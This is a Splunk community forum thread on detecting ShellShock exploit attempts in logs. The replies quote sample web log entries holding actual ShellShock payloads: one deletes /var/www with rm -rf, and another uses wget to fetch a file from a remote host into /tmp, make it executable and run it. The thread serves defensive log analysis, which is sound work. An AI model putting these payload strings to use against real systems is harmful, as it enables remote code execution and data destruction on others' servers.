Splunk Search

How to use Splunk to detect ShellShock exploit attempts?

jkhsplunkuser
Engager

Let me start by saying I am brand new to Splunk, and not a programmer by profession, but I am surprised that this question has not been discussed. "What query would I run to see if someone has used the ShellShock vulnerability to attack my system?"

I think there must be an answer because the blog discussion on how to ensure that all devices are patched for ShellShock starts with the following:
"I’ll let others tell you how you could use Splunk to search through your various logs for evidence that evildoers are trying to exploit this in your environment."

Thanks

Tags (2)
1 Solution

mmaier_splunk
Splunk Employee
Splunk Employee

Some other examples and good discussion: http://security.stackexchange.com/questions/68327/what-do-shellshock-attacks-look-like-in-system-log...

Weblog Sample:

10.11.12.13 - - [25/Sep/2014:16:00:00 -0400] "GET /cgi-bin/testing.cgi HTTP/1.0" 200 1 "-" "() { test;};echo \"Content-type: text/plain\"; echo; echo; /bin/rm -rf /var/www/"    

Unix Log Sample:

[Thu Sep 25 16:00:00 2014] [error] [client 10.11.12.13] /bin/rm: cannot remove `/var/www/icons/pie0.png': Permission denied

View solution in original post

mmaier_splunk
Splunk Employee
Splunk Employee

Some other examples and good discussion: http://security.stackexchange.com/questions/68327/what-do-shellshock-attacks-look-like-in-system-log...

Weblog Sample:

10.11.12.13 - - [25/Sep/2014:16:00:00 -0400] "GET /cgi-bin/testing.cgi HTTP/1.0" 200 1 "-" "() { test;};echo \"Content-type: text/plain\"; echo; echo; /bin/rm -rf /var/www/"    

Unix Log Sample:

[Thu Sep 25 16:00:00 2014] [error] [client 10.11.12.13] /bin/rm: cannot remove `/var/www/icons/pie0.png': Permission denied

jkhsplunkuser
Engager

Thanks. The discussion at this link is a big help.

mmaier_splunk
Splunk Employee
Splunk Employee

Hi,

possible you can review the logs of your web server.

search for unix similar expressions like... chmod 777,echo, ls, cd etc.

Sample Log:

192.168.1.1 - - [25/Sep/2014:14:00:00 +0000] "GET / HTTP/1.0"  400 349 "() { :; }; wget -O /tmp/besh http://192.168.1.1/filename; chmod 777  /tmp/besh; /tmp/besh;"

Source: https://securelist.com/blog/research/66673/bash-cve-2014-6271-vulnerability-qa-2/

Br
Matthias

0 Karma
Get Updates on the Splunk Community!

SplunkTrust Application Period is Officially OPEN!

It's that time, folks! The application/nomination period for the 2025 SplunkTrust is officially open! If you ...

Splunk Answers Content Calendar, June Edition II

Get ready to dive into Splunk Dashboard panels this week! We'll be tackling common questions around ...

Splunk Observability Cloud's AI Assistant in Action Series: Auditing Compliance and ...

This is the third post in the Splunk Observability Cloud’s AI Assistant in Action series that digs into how to ...